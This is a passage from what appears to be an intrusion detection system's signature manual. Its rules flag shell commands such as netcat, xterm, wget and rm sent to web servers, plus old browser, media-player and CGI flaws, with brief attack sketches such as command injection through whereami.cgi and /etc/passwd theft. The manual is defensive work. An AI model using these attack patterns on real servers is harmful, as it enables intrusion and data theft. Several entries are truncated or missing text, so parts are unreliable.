Signature Description: This is an attempt to execute a perl script on a host. perl is a scripting language that is available
on a wide variety of platforms. By default perl code runs with full access to all libraries and inbuilt commands available
to the language. When combined with the access permissions of the user executing the script, the consequences of
running arbitrary code can be devastating. Logs will be generated for this signature when /usr/bin/perl pattern is sent to
the http server.
Signature ID: 913
X server display parameter vulnerability
Signature Description: This rule generates an event when an X Windows system command is used with a parameter to
set the display location over a plain-text (unencrypted) connection on one of the specified web ports to the target web
server. The "display" parameter is used to specify an address for the X server to listen for connections.
Signature ID: 914
/bin/nasm command web execute vulnerability
Signature Description: This is an attempt to compile a program source on a host using NASM (Netwide Assembler)
which is capable of compiling a variety of sources on a variety of platforms into executable binary files. The attacker
could possibly compile a program needed for other attacks on the system or install a binary program. This rule will
triggers when an attempt is made to send an /bin/nasm pattern.
Signature ID: 915
Bin/python command web execute vulnerability
Signature Description: Python is a dynamic object-oriented programming language that can be used for many kinds of
111
software development. It offers strong support for integration with other languages and tools, comes with extensive
standard libraries. This is an attempt to execute a arbitrary python script outside its designated web root or cgi-bin, by
issuing bin/python command to the web server.
Signature ID: 916
Bin/tclsh command web execute vulnerability
Signature Description: Tclsh is a shell-like application that reads Tcl commands from its standard input or from a file
and evaluates them. If invoked with no arguments then it runs interactively, reading Tcl commands from standard input
and printing command results and error messages to standard output. It runs until the exit command is invoked or until
it reaches end-of-file on its standard input. This rule will triggers when an attempt is made to send an bin/tclsh pattern
via web clients.
Signature ID: 917
Cc command web execute vulnerability
Signature Description: This is an attempt to compile a C or C++ source file on a host. The "cc" command is the GNU
possibly compile a program needed for other attacks on the system or install a binary program of his choosing. This
rule generates an event when an attacker sent "cc" pattern to the http server.
Signature ID: 918
Chgrp command web execute vulnerability
Signature Description: This is an attempt to change file permissions on a machine. Using "chgrp" command an attacker
may change the permissions of a file to suit his own needs, make a file readable, writeable or excutable to other groups
and users that would otherwise not have these special permissions. Logs will be generated for this signature when
"/bin/chrp" pattern is sent to http server.
Signature ID: 919
Chmod command web execute vulnerability
Signature Description: This is an attempt to change file permissions on a machine. Using "chmod" command an
attacker may change the permissions of a file to suit his own needs, make a file readable, writeable or excutable to
other groups and users that would otherwise not have these special permissions. Logs will be generated for this
signature when "/bin/chmod" pattern is sent to http server.
Signature ID: 920
Chown command web execute vulnerability
Signature Description: This is an attempt to change file ownership permissions on a machine. Using "chown"
command an attacker may change the permissions of a file to suit his own needs, make a file owned by another user
who would otherwise not have these special permissions. Logs will be generated for this signature when "chown"
pattern is sent to http server.
112
Signature ID: 921
Chsh command web execute vulnerability
Signature Description: This is an attempt to change a users shell on a machine. Using "chsh" command an attacker may
change the shell of a user to suit his own needs. By changing the shell an attacker may further compromise a machine
by specifying a shell that could contain a Trojan Horse component or that could contain embedded commands specially
crafted by anattacker. Logs will be generated for this signature when /usr/bin/chsh pattern is sent to http server.
Signature ID: 922
WEB-ATTACKS conf/httpd.conf vulnerability
Signature Description: The httpd.conf file lists the configuration of the web server including modules loaded on start
and access authorization files. The attacker can make a standard HTTP request that contains 'conf/httpd.conf' in the
URI and gain information needed for other attacks on the host. Logs will be generated for this signature when
"conf/httpd.conf" pattern is sent to the http server.
Signature ID: 923
Cpp command web execute vulnerability
will be generated for this signature when "cpp" pattern is sent to the http server.
Signature ID: 925
G++ command web execute vulnerability
Signature Description: This is an attempt to compile a C or C++ source file on a host. The g++ command is the GNU
will be generated for this signature when "g++" pattern is sent to the http server.
Signature ID: 926
Gcc command web execute vulnerability
Signature Description: This is an attempt to compile a C or C++ source on a host. The gcc command is the GNU
will be generated for this signature when "gcc" pattern is sent to the http server.
Signature ID: 927
Id command web execute vulnerability
Signature Description: Id is a UNIX command that will return information about the system's users and groups. This
information is valuable to an attacker who can use it to plan further attacks based on the users possible login
information or be more effective in targeting specific users and groups who possess elevated privileges . The id
command will return information on the user and the users "gid" and "uid". Logs will be generated for this signature
when id pattern is sent to the http server.
113
Signature ID: 928
Kill command web execute vulnerability
Signature Description: This is an attempt to either stop or restart system processes on a web server. By stopping a
service the attacker can effectively issue a "Denial of Service" to a particular process on a machine. When used to
restart a process, the attacker can force a legitimate process to re-read the associated configuration file and possibly
compromise the service by replacing the original configuration with one crafted by the attacker. The presence of the
"kill" command in web traffic indicates that an attacker is attempting to trick the web server to execute in noninteractive mode.
Signature ID: 929
Lsof command web execute vulnerability
Signature Description: This rule generates an event when a "losf" command is used over a plain-text connection on one
of the specified web ports to the target web server. The "lsof" command lists information about files that are open by
the running processes. An open file may be a regular file, a directory, a block special file, a character special file, an
executing text reference, a library, a stream or a network file. The attacker could possibly gain information needed for
other attacks on the system.
Signature ID: 930
HTTP mail command web execute vulnerability
Signature Description: This rule generates an event when a "mail" command is used over a plain-text connection on
one of the specified web ports to the target web server. The "mail" command is used to read and send email on UNIX
systems. The presence of the "mail" command in the URL indicates that an attacker attempted to trick the web server
into executing a system command in non-interactive mode.
Signature ID: 932
WEB-ATTACKS netcat command vulnerability
Signature Description: This rule generates an event when a "netcat" command is used over a plain-text connection on
one of the specified web ports to the target web server. The "netcat" command may be used to establish an interactive
shell session to the machine and also transfer files over the connection. The presence of the "netcat" command in the
URI indicates that an attacker attempted to trick the web server into executing system in non-interactive mode.
Signature ID: 933
Nmap command web execute vulnerability
Signature Description: This rule generates an event when a "nmap" command is used over a plain-text (unencrypted)
connection on one of the specified web ports to the target web server. The "nmap" command may be used to discover
open ports, services and operating system information on hosts. The presence of the "nmap" command in the URI
indicates that an attacker attempting to trick the web server into executing system in non-interactive mode.
Signature ID: 934
WEB-ATTACKS nt admin addition vulnerability
Signature Description: This rule generates an event when an attempt is made to gain unauthorized access to a web
server or an application running on a web server. Some applications do not perform stringent checks when validating
114
the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access
and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust
relationships between the victim server and other hosts can be exploited by the attacker.
Signature ID: 935
Perl Web Execution Vulnerability
Signature Description: This is an attempt to execute a perl script on a host. Perl is a scripting language that is available
on a wide variety of platforms. By default perl code runs with full access to all libraries and inbuilt commands available
to the language. When combined with the access permissions of the user executing the script, the consequences of
running arbitrary code can be devastating
Signature ID: 936
Ping command web execute vulnerability
Signature Description: This rule generates an event when a "ping" command is used over a plain-text (unencrypted)
connection on one of the specified web ports to the target web server. The "ping" command may be used to perform
information gathering activities.
Signature ID: 937
/bin/ps command web execute vulnerability
Signature Description: The ps command lists the process status of running processes on a UNIX or Linux based
system. Using "ps", the attackers would check for various running system services to exploit or for the presence of
security software, such as host IDS or monitoring scripts. The attacker could possibly gain information needed for other
attacks on the system. This rule will triggers when an attempt is made to send an /bin/ps pattern to http web server.
Signature ID: 938
WEB-ATTACKS python access vulnerability
Signature Description: This is an attempt to execute a python script on a host. Python is a scripting language that is
available on a wide variety of platforms. By default Python code runs with full access to all libraries and inbuilt
commands available to the language. When combined with the access permissions of the user executing the script, the
consequences of running arbitrary code can be devastating. Logs will be generated for this signature when python
pattern is sent to the http server.
Signature ID: 939
Remove (rm) Command in URI vulnerability
Signature Description: This is an attempt to remove files on a machine. Using "rm" command an attacker may delete
files on a machine. The attacker can make a standard HTTP request that contains "rm" in the URI which can then delete
files present on the host. This command may also be requested on a command line should the attacker gain access to
the machine. This rule generates an event when an attacker sent "rm" command to the http server.
Signature ID: 940
Tclsh web execution vulnerability
Signature Description: This is an attempt to execute a 'tclsh' command or script on a webserver. tclsh is a shell
115
application that reads tcl commands and evaluates them. The attacker could possibly execute a command or script on
the host. Logs will be generated for this signature when tclsh pattern is sent to the http server.
Signature ID: 941
Tftp command web execute vulnerability
Signature Description: Trivial File Transport Protocol(TFTP) is a very simple file transfer protocol, with the
functionality of a very basic form of FTP. This rule will triggers when possible attempt to gain information using the
Trivial File Transfer Protocol (tftp) to access sensitive files on a web server. It is also possible that an attempt is being
made to remotely boot or reboot a device using tftp.
Signature ID: 942
WEB-ATTACKS traceroute command Vulnerability
Signature Description: Traceroute is a computer network tool used to determine the route taken by packets across an IP
network. The traceroute tool is available on practically all Unix-like operating systems. This rule looks for the
"traceroute" command in the client to web server network traffic but does not indicate whether the command was
actually successful. The presence of the "traceroute" command in the URI indicates that an attacker attempted to trick
the web server into executing system commands in non-interactive mode i.e. without a valid shell session.
Signature ID: 943
Uname -a command web execute Vulnerability
Signature Description: Uname is a UNIX command that will return information about the operating system, the
machine's architecture, the processor architecture and the version level of the software being used. This information is
valuable to an attacker who can use it to plan further attacks based on possible vulnerabilities in the machine's
operating system. This rule generates an event when an attacker sent "uname" pattern to the http server.
Signature ID: 944
WGet NTLM Username Buffer Overflow Vulnerability
Signature Description: Wget is GNU software that allows for retrieval of files using HTTP, HTTPS and FTP. wget
1.10.1 is vulnerable to a buffer overflow. A successful exploitation of this attack will allow an attacker to execute
arbitrary commands on the vulnerable system. This rule generates an event when an attacker sent wget pattern. This
issue is fixed in wget 1.10.2 version. Administrators are advised to upgrade the 1.10.2 or later version to resolve this
issue.
Signature ID: 945
Xterm command attempt
Signature Description: This rule generates an event when a "xterm" command is used over a plain-text connection on
one of the specified web ports to the target web server. The "xterm" command may be used to establish an interactive
shell session to the machine. The presence of the "xterm" command in the URI indicates that an attacker attempted to
trick the web server into executing system in non-interactive mode.
116
Signature ID: 1000
Mozilla JavaScript URL Arbitrary Cookie Access Vulnerability
Bugtraq: 5293
Signature Description: Mozilla is an open source web browser available for a number of platforms, including
Microsoft Windows and Linux. Mozilla browser 0.9.2 is vulnerable to a cookie access vulnerability. A successful
exploitation of this vulnerability will allow an attacker to gaining access to sensitive cookie data, including
authentication credentials. This rule generates an event when an attacker sent cookie pattern to the http server. This
vulnerability is fixed in Mozilla browser 1.1 version. Administrators are advised to upgrade 1.1 or later version to
resolve this vulnerability.
Signature ID: 1001
Javacript document.domain execution vulnerability
Signature Description: Implementations of Javascript in multiple browsers on multiple platforms contain an error that
may lead to a user inadvertantly running Javascript code of attackers choice. Microsoft, Internet Explorer6 and prior
versions, Mozilla 1.0 and prior versions are vulnerable. These browsers may allows a remote web server to access
HTTP and SOAP/XML content from restricted sites by mapping the malicious server's parent DNS domain name to the
restricted site, loading a page from the restricted site into one frame, and passing the information to the attackercontrolled frame, which is allowed because the document.domain of the two frames matches on the parent domain.
Patches are available at vendor's websites.
Signature ID: 1002
Microsoft Extended Metafile in URI Vulnerability
Bugtraq: 9707
Signature Description: Microsoft Internet Explorer (MSIE), commonly abbreviated to IE, is a series of graphical web
browsers developed by Microsoft and included as part of the Microsoft Windows line of operating systems. Microsoft
Windows XP Professional SP1 and prior versions are vulnerable. Microsoft Windows Explorer for these versions may
be prone to a multiple memory corruption vulnerabilities including a heap based overflow and an integer overflow. The
issues exist in the Metafile processing code. A malformed header may cause a DoS condition to occur. It may also be
possible for an attacker to execute code their choice on a vulnerable host.
Signature ID: 1004
Symantec Norton AntiSpam 2004 LaunchCustomRuleWizard buffer overflow vulnerability
Signature Description: Symantec AntiSpam with AntiVirus makes email more secure and productive, providing
enterprises with an advanced antispam and email threat defense plus AntiVirus protection (powered by the Symantec
AntiVirus engine). Symantec Norton AntiSpam 2004 is vulnerable, stack-based buffer overflow in the
SymSpamHelper ActiveX component (symspam.dll), as used in Norton Internet Security 2004, allows remote attackers
to execute arbitrary code via a long parameter to the LaunchCustomRuleWizard method.
Signature ID: 1005
OUTLOOK EML gain access Vulnerability
Signature Description: Outlook Express is designed for users to gain access to their e-mail messages by dialing in to an
Internet Service Provider. It provides full support all popular mail standards such as SMTP, POP3, IMAP, LDAP,
117
S/MIME, HTML etc. This rule triggered when an attacker could request the .eml file. The EML file can contain
encoded attachments(such as grapics, files, etc.) and all recovered/repair messages are save as .eml files. An attacker
can use this vulnerability to gain unauthorized access.
Signature ID: 1006
RealOne Player SMIL File Script Execution vulnerability
Industry ID: CVE-2003-0726 CVE-2004-2371 Bugtraq: 9738,8453
Signature Description: RealOne Player is a cross-platform media player by RealNetworks that plays a number of
multimedia formats including MP3, MPEG-4, Windows Media, and multiple versions of proprietary RealAudio and
RealVideo formats. RealOne Player Gold for Windows 6.0.10 .505 and prior versions are vulnerable. RealOne player
Gold 6.0.10 .505 and prior versions allows remote attackers to execute arbitrary script in the "My Computer" zone via a
specially crafted Synchronized Multimedia Integration Language (SMIL) file that will cause the player to load a series
of arbitrary URLs. If one of the URLs contains scripting code, the player will execute the scripting code in the context
of the previous URL. Patches are available at Real websites.
Signature ID: 1007
XMLHttpRequest mishandling HTTP redirect vulnerability
Signature Description: The XMLHttpRequest object (XMLHTTP) in Netscape 6.1 and Mozilla 0.9.7 allows remote
attackers to read arbitrary files and list directories on a client system by opening a URL that redirects the browser to the
file on the client, then reading the result using the responseText property.
Signature ID: 1008
Microsoft Internet Explorer Header Local Resource Access via Location: HTTP Response
Header vulnerability
Signature Description: Microsoft, Internet Explorer 5.01 SP4 and prior verions are vulnerable. The cross domain
security model that Internet Explorer implements is to make sure that browser windows that are under the control of
different Web sites cannot interfere with each other or access each other's data, while allowing windows from the same
site to interact with each other. Internet Explorer uses cross-domain security model to maintain separation between
browser frames from different sources. A remotely exploitable cross domain vulnerability exists in Internet Explorer.
The Location response-header field is used to redirect the recipient to a location other than the Request-URI for
completion of the request or identification of a new resource. An attacker can configure a web server to send a delayed
300 response specifying a URL that points to a resource on the client's system, in the Local Machine Zone which would
cause the file to open, once the page is visited. An attacker could exploit this vulnerability by hosting the malicious
Web page on a Web site or by sending it to a victim as an HTML email. By making use of a second vulnerability
Modal Dialog Zone Bypass javascript can be executed within the victim's "My Computer" security zone.
Administrators are advised to install the updates mentioned in MS04-025.
Signature ID: 1009
Autoload readme.eml
Signature Description: This is an attempt is made to load and run readme.eml, which is used as an infection vector for
the nimda worm.The nimda worm affects Microsoft Windows systems and attempts to spread via email, network shares
and Microsoft IIS servers. A compromised server will attempt to spread and infect other vulnerable hosts.
118
Signature ID: 1010
Nimda-infected web server readme.eml file vulnerability
Signature Description: Nimda is a computer Worm that caused traffic slowdowns as it rippled across the Internet,
spreading through four different methods, infecting computers containing Microsoft's Web server, Internet Information
Server(IIS), and computer users who opened and e-mail attachment. Nimda is denial of service vulnerability. This rule
triggered when an attacker load a infected HTML files, the JavaScript will cause the download and execute the
README.EML file. The worm creates README.EML file, which is the multi-partite message with MIME-encoded
worm, in the same directory and adds a small JavaScript code to the end of found files.
Signature ID: 1011
Microsoft Internet Explorer File Name Spoofing Vulnerability using CLSID File Extension
Signature Description: The Windows Shell application programming interface (API) supports the ability to associate a
class identifier (CLSID) with a file type. A CLSID as an extension instead of file extension is enough to launch the
application by Windows Shell similar to the case when file extension is used. The files that Internet Explorer is not able
to handle are asked to save to the local disk or open using a known application with the help of file extension
association using a dialog box. A vulnerability exists in Internet Explorer because it is unable to save the file it cannot
handle with the file's real extension. This is due to a flaw in Internet Explorer when it handles filenames that contain
multiple dots. It displays the filename up to before the last period, but it saves the file with the extension that is after the
last period. This vulnerability can be exploited by spoofing a filename with a . followed by CLSID and a '%2e' and an
extension like 'mpeg', for eg., 'abc.{3050f4d8-98B5-11CF-BB82-00AA00BDCE0B}malware%2empeg'. By using
Content-Disposition field to have the malicious filename in the response header of a HTTP request and convincing the
user to follow a malicious link a remote attacker could be able to exploit the vulnerability. Since Internet Explorer
cannot display the data, a dialog box is displayed to download the data and the %2e in the filename is URL decoded
and displayed as a . (dot) in the dialog allowing the user to think that he is downloading or opening a file of that type
(in eg., it is mpeg). Once the user opens the file malicious file will be executed because CLSID is already mentioned in
the filename. Administrators are advised to install the updates mentioned in MS04-024.
Signature ID: 1012
Microsoft Windows GDI+ Library JPEG File Parsing Buffer Overflow Vulnerability
Signature Description: Microsoft Windows Graphics Device Interface (GDI+) is an application programming interface
(API) that provides programmers the ability to display information on screens and printers. A remotely exploitable
buffer overflow vulnerability exists in JPEG file parsing component of GDI+ (Gdiplus.dll). A JPEG file is composed of
multiple sections with each section starting with a two-byte-long section marker followed by a 2 byte length of the
marker . Data corresponding to this section will present here. Comment marker (0xfffe) ina JPEG file is used to write
comments about the JPEG file. If the length of the comment marker is mentioned as 0x0000 or 0x0001, GDI+ library
normalizes this value to a very big value while processing and tries to copy those many bytes resulting in a heap
overflow. This vulnerability can be exploited by constructing a specially crafted JPEG file and convincing the victim to
open the malicious JPEG image with one of the affected components which make use of GDI+ library to parse JPEG
files. Administrators are advised to install the updates mentioned in MS04-028.
Signature ID: 1013
Microsoft ANI file parsing overflow vulnerability
119
Signature Description: Microsoft Windows platforms, the LoadImage API routine is used to load an image from a file.
The LoadImage API is included part of the USER 32 library. Microsoft Windows NT Server 4.0 SP6 and prior verions,
Microsoft Windows XP Professional SP1 and prior verions are vulnerable. A lack of input validation on user supplied
input to the LoadImage API routine may allow an integer overflow to occur. It is heap based buffer overflow, this can
be exploited through a website by using maliciously crafted animated cursor files, Successful exploitation allows
execution of arbitrary code. All before versions of Microsoft Windows XP with Service Pack2 are affected. Patches are
available at microsoft website.
Signature ID: 1014
Mozilla GIF heap overflow vulnerability
Signature Description: Graphic Interchange Format (GIF), this image processing library used in some Mozilla
products. Firefox before 1.0.2, Mozilla before to 1.7.6, and Thunderbird before 1.0.2 are use the same library, these all
versions are vulnerable. This library contains a flaw, allows remote attackers to execute arbitrary code via a GIF image
with a crafted Netscape extension 2 block and buffer size(32-bit integer). This integer is used to determine image buffer
space, attacker may misrepresent this value to exploit, then heap will overflow. Patches are available at particular
vendor website.
Signature ID: 1015
Microsoft Windows Media Player PNG Image Buffer Overflow Vulnerability
Signature Description: The Portable Network Graphics (PNG) format is an established image standard and well
supported in applications that view images. Microsoft Windows Media Player version 9 (when running on Windows
2000, Windows XP SP1 and SP2, or Windows Server 2003), Microsoft MSN Messenger 6.1 and 6.2, Windows 98,
Windows 98 SE and Windows ME are vulnerable to a buffer overflow, caused by improper handling of PNG (Portable
Network Graphics) files. A PNG image consists of a PNG header followed by a sequence of "chunks" (PNG
specification defines 18 such chunk types). PNG format stores the information about the image in the form of chunks
and each type of chunk conveys some specific information about the image. A remote attacker could create a speciallycrafted PNG image with large width or height value in IHDR chunk to overflow a buffer and execute arbitrary code on
the system. An attacker who successfully exploited this vulnerability may be able to execute arbitrary code with the
privileges of the user. Users are advised to install the updates mentioned in MS05-009. This signature detects attacks
patterns after detected pattern IHDR, it is checking at relative-offset 8 for one byte value.
Signature ID: 1016
patterns after detected pattern IHDR, it is checking at relative-offset 4 for 4 bytes value.
120
Signature ID: 1017
patterns after detected pattern IHDR, it is checking at relative-offset 0 for 4 bytes value.
Signature ID: 1020
Directory Traversal Attempt Using Content-Disposition Filename Parameter vulnerability
Signature Description: Windows Media Player is a digital media player and media library application developed by
Microsoft, that is used for playing audio, video and viewing images on personal computers running the Microsoft
Windows operating system. Media Player 7.1 and Windows Media Player for Windows XP are vulnerable, these
versions allows remote attackers to execute arbitrary code. This media pleyer downlods shins with HTTP protocol,
attacker will execute arbitrary code via a skins file with a URL containing hex-encoded backslash characters (%5C)
that causes an executable to be placed in an arbitrary location. Content-disposition is an MIME entity which allows to
save a file with a specified name through filename parameter. This rule triggers when the filename parameter contains a
sequence similar to ../ or ..\ which indicates a directory traversal attempt. Patches are available at microsoft website.
Signature ID: 1021
Microsoft Internet Explorer Bitmap Image File Integer Overflow Vulnerability
Signature Description: Windows Internet Explorer commonly abbreviated to IE, is a series of graphical web browsers
developed by Microsoft. Microsoft Internet Explorer in Windows 2000 is vulnerable to an integer overflow while
processing a BMP image file. A bitmap image always starts with two fixed characters 'BM'. bfOffbits, a field in bitmap
file is a 4 byte length field which specifies the byte offset from the beginning of the file at which the bitmap data starts.
MSHTML.DLL in Internet Explorer parses the BMP file and tries to store the bfOffbits size as a signed integer. By
creating a specially crafted BMP file with bfOffbits field set to a large value such as > 2^31 can cause integer overflow
while processing the file by Internet Explorer. An attacker could exploit this vulnerability by hosting the malicious file
on a Web site or by sending it to a victim as an HTML email. Successful exploitation allows a remote attacker to
execute arbitrary code on a vulnerable system. Administrators are advised to install the updates mentioned in MS04025.
Signature ID: 1022
Apple iTunes pls/m3u Playlist Buffer Overflow Vulnerability
Signature Description: Apple iTunes is a digital media player available for the Microsoft Windows and Mac OS X
121
operating systems. It supports a variety of playlist formats including .m3u and .pls. Apple iTunes 4.7 is vulnerable, a
playlist allows a user to organize the order in which media files are played. In addition to media files, URLs to digital
streams can be included in a playlist. There is a buffer overflow vulnerability in the way iTunes parses URL
entries in .m3u and .pls playlist files. An attacker could exploit this vulnerability by constructing a specially crafted
playlist containing a very long URL to execute arbitrary code. To exploit this vulnerability, an attacker would need to
convince a user to open a malicious playlist file using this vulnerable version. Patches are available at apple website.
Signature ID: 1023
Internet Explorer PNG Image Rendering Component Buffer Overflow Vulnerability/Libpng
Graphics Library Large tRNS Chunk Buffer Overflow vulnerability
supported in applications that view images. Microsoft's PNG filter library is a multi-purpose implementation of PNG
rendering, and is used by applications such as Internet Explorer. The PNG image rendering component of Microsoft
Internet Explorer (pngfilt.dll) does not properly handle PNG image files, potentially allowing a buffer overflow to
occur. A PNG image consists of a PNG header followed by a sequence of "chunks" (PNG specification defines 18 such
chunk types). PNG format stores the information about the image in the form of chunks and each type of chunk
conveys some specific information about the image. A remote attacker could create a specially-crafted PNG image with
large tRNS chunk to overflow a buffer and execute arbitrary code on the system. If a user opens a specially-crafted
PNG image using a vulnerable version of Internet Explorer, an attacker may be able execute arbitrary code. An attacker
who successfully exploited this vulnerability may be able to execute arbitrary code with the privileges of the user or
cause Internet Explorer to terminate. Administrators are advised to install the updates mentioned in MS05-025. Libpng
is a Portable Network Graphics (PNG) library for Unix platforms. Libpng versions 1.2.5 and prior affected by same
vulnerability.
Signature ID: 1024
Microsoft Internet Explorer Object Tag Type Property Buffer Overflow Vulnerability
Signature Description: Microsoft Internet Explorer versions 5.1, 5.5 and 6.0 are vulnerable to a buffer overflow by
using 'Type' property of 'Object' tag. The 'Object' tag is used to insert objects such as ActiveX components into HTML
pages and the 'Type' property of the 'Object' tag is used to set or retrieve the MIME type of the object such as
'plain/text', 'application/hta' etc., The length check of the buffer size for Type property can be bypassed when the buffer
includes '/' characters. The '/' character is modified to 3 characters '_/_' while copying and the length check is done prior
to modification. Because of this expansion, buffer will be overflown and allows execution of arbitrary code. An
attacker could create an HTML file that includes a malicious OBJECT tag to execute arbitrary code on the victim's
machine. When a victim using a vulnerable version of IE, or other applications that use IE as their HTML interpreter,
visits the malicious file (via web page, email message, file sharing, etc.), the attacker-supplied code will be executed.
Microsoft has addressed this issue in security bulletin MS03-020.
Signature ID: 1025
NullSoft Winamp IN_CDDA.dll File Buffer Overflow Vulnerability
Signature Description: Winamp is a media player for Microsoft Windows developed by NullSoft. Winamp version
5.05 and earlier are vulnerable to a stack-based buffer overflow, caused by improper bounds checking of .cda files
within a .m3u or .pls playlist file. The vulnerability specifically exists in cdda.dll library where Winamp handles
CDDA entries contained in playlist files. Winamp copies the filename in a CDDA (.cda) media path to a 16-byte buffer
without first checking its size. By supplying an overly long .cda file name, a remote attacker can overflow the buffer
122
when the file is processed by Winamp. By convincing a user to open a specially crafted playlist file, a remote
unauthenticated attacker may be able to execute arbitrary code. This can be achieved by creating a specially crafted
web page or other HTML document that may launch Winamp without any user interaction. Users are advised to install
newer version of Winamp.version 5.0.1 to 5.0.6 are prior versions are vulnerabe. Patches are available at winamp
website.
Signature ID: 1026
Microsoft Windows WinHlp Item Buffer Overflow Vulnerability
Signature Description: The HTML Help ActiveX control provides a rich feature set for help systems. Key features
include: an expanding table of contents, keyword search, shortcuts, and pop-up help topics. The control is one of the
authoring components that ships with Microsoft HTML Help. Microsoft Windows XP Professional and prior
verions, Microsoft Windows NT Workstation 4.0 SP6a and prior versions are vulnerable. These verions allow remote
attackers to execute arbitrary code via an HTML document that calls the HTML Help ActiveX control (HHCtrl.ocx)
with a long pathname in the Item parameter. No remedy is available.
Signature ID: 1027
HTTP /cgi-bin Directory Access Vulnerability
Signature Description: Cgi-bin is the directory that holds CGI scripts and programs written usually in Perl or Unix
Shell. cgi-bin could allow an attacker to gain sensitive information and execute inappropriate commands on a CGI
application(running on a web server), when accessing the /cgi-bin/ directory.
Signature ID: 1028
/cgi-dos/ HTTP access Vulnerability
them HTTP responses along with optional data contents is known as a web server. O'Reilly's Website Pro is a web
server. This rule detects possible unauthorized access to the CGI application running in the web server by detecting
/cgi-dos/ content in the URI. This successful exploitation can allow an attacker to access batch files and then execute
arbitrary commands.
Signature ID: 1029
AHG Search Engine Search.CGI Arbitrary Command Execution Vulnerability
Signature Description: AHG is a search engine that searches html pages in your local directory tree and returns the list
of links to the pages where entered keyword(s) are found. Search.CGI is a component of the HTMLsearch Search
Engine software distributed by AHG. AHG HTMLsearch 1.0 is vulnerable, this HTMLsearch is not validating properly
the user-supplied input in the search.cgi script, so a remote attacker can send a crafted URL containing arbitrary
commands separated by semicolon(;) or pipe(|) characters to execute arbitrary commands on the Web server. No
remedy available as of August 2008.
Signature ID: 1030
AT-generated.cgi web access vulnerability
Signature Description: This rule detects possible execution of arbitrary code or unauthorized access to the CGI
123
application running in the webserver by detecting /AT-generated.cgi content in the URI. Excite for Web Servers (EWS)
1.1 is prone to this vulnerability
Signature ID: 1031
AlienForm2 CGI directory traversal vulnerability
Signature Description: AlienForm2, developed by Jon Hedley, is a Web form to the email gateway written in Perl.
 AlienForm2 version 1.5 is vulnerable, it could allows a remote attacker to traverse directories on the Web server.
A remote attacker will send a crafted URL request to af.cgi script, this request containing modified "dot dot" sequences
(such as .|.%2F) to traverse directories and manipulates arbitrary files on the server(to view any file, append arbitrary
 data to an existing file, and write arbitrary data to a new file on the target computer). This is way to the disclosure
of sensitive system information which may be used by an attacker to further compromise the system. No remedy
available as of August 2008.
Signature ID: 1032
Aplio Internet Phone Arbitrary Command Execution Vulnerability
Signature Description: Aplio, Aplio Internet Phone is VoIP, it works with SIP and RTP protocols. Aplio, Aplio
Internet Phone 2.0.33 is vulnerable version. An attacker can send a specially-crafted URL to the device and execute
commands in /bin/sh. After received these type of request URLs submitted to the device are not properly filtered for
shell meta characters. So the attacker could exploit this vulnerability to access the password stored in the configuration
file, and then connect to the device and perform additional attacks.
Signature ID: 1033
W3C Amaya Templates Server Directory Traversal Vulnerability
Signature Description: W3C's Amaya is a WYSIWYG web browser and authoring program. A complement package,
the templates server, provides the ability to retrieve templates from an apache web server, for use in Amaya-based
authoring. W3C templates server for Amaya 1.1 is vulnerbale version, one of the scripts used by this vulnerable server,
sendtemp.pl, is vulnerable to a simple directory traversal and file retrieval vulnerability. After received the request, this
script doing insufficient parsing of the requested template files. Remote attackers can specify a template containing
"dot dot" (../) sequence methods of traversing directories to retrieve arbitrary files. This is a non-priority technology
vulnerability.
Signature ID: 1034
Armada Master Index directory traversal Vulnerability
Signature Description: Master Index is a professional search engine such as Yahoo and Alta Vista. This search engine
supports loads of features. Admins can set script to automatically add submissions or wait until confirmed by the
admin, users can edit and delete their listings. Armada Design Master Index 1.0 is vulnerable, this could allows a
remote attacker to traverse directories on the Web server. The 'catigory' variable input parameters to the search.cgi
script is not properly validating for "dot dot" (/../) sequences in URLs. No remedy available as of August 2008.
124
Signature ID: 1035
CCBill WhereAmI.CGI Remote Arbitrary Command Execution Vulnerability
Bugtraq: 8095
Signature Description: CCBill uses a CGI called whereami.cgi for its technical support needs, a vulnerability in the
CGI it allows remote attackers to execute commands. Whereami.cgi is not properly validating the types of input
parameters. Because of this, an attacker may be able to gain access to a system with the privileges of the web server
process. It is possible to supply system commands to the "g" parameter to WhereAmI.CGI(whereami.cgi?g=command
format in a URL). Supplied commands can list file names, show the contents of the password file, or install a back
door. No remedy is available as of august 2008.
Signature ID: 1037
Emumail Webmail Cross Site Scripting Vulnerability
Signature Description: EMUMAIL is a group of talented programmers, designers, and business types, united to bring
custom tailored, cutting edge technology to the cookie-cutter electronic messaging industry. EMUMAIL designs and
builds communications infrastructure for ISPs, corporations, individuals, and organizations worldwide. EMU Webmail
5.2.7 is vulnerable, this will not validating properly the user input passed parameters before it is returned. This can be
exploited to execute arbitrary HTML and script code in a user's current browser session in context of an affected site.
Finally it may allows an attacker to carry out cross-site scripting. No remedy available as of August 2008.
Signature ID: 1038
EMU Webmail init.emu path disclosure vulnerability
Signature Description: EMUMAIL is a group of talented programmers, designers, and business types, united to bring
custom tailored, cutting edge technology to the cookie-cutter electronic messaging industry. EMUMAIL designs and
builds communications infrastructure for ISPs, corporations, individuals, and organizations worldwide. EMU Webmail
5.2.7 is vulnerable, this will not validating properly the user input passed parameters before it is returned. This can be
exploited to execute arbitrary HTML and script code in a user's current browser session in context of an affected site. A
remote attacker requests the init.emu script without parameters, which contains the installation path of EMU Webmail.
which will disclose the physical path of the script resulting in a loss of confidentiality. No remedy available as of
August 2008.
Signature ID: 1039
FormHandler.cgi Directory Traversal Vulnerability
Signature Description: FormHandler takes care of all of basic tasks while offering some advanced features that allow
to easily use forms to send requested files to a visitor via email create Web-based email interfaces, administer simple
mailing lists. Matt Wright FormHandler.cgi 2.0 is vulnerable, these versions are allowing attackers to read all files on
the server that the CGI script has read access to, including the /etc/passwd file. An attacker could save the templates as
files that reference absolute pathnames in the form document. Once an attacker clicks submit on the local form, the
FormHandler CGI would email the /etc/passwd file to the specified email address. No remedy available as of August
2008.
125
Signature ID: 1040
IWeb Hyperseek 2000 Directory Traversal Vulnerability
Signature Description: IWeb Hyperseek Jackhammer is a Search Engine System. This Search Engine is a powerful
Perl based script which helpfull to create and manage an online Pay per click search engine on website with complete
support. The major features that are offered along with this script features include Category Structures of Unlimited
Depth, Top Rated Relevancy Matching, Adult Filtering, support of multiple paid incoming "backfill" feeds, eligible for
revenue sharing to your own affiliates.iWeb Systems HyperSeek 2000 version is vulnerable, when these verions are
using there is a chance to read arbitrary files and directories via directory traversal attack in the show parameter to
hsx.cgi script. patches are available at vendor website.
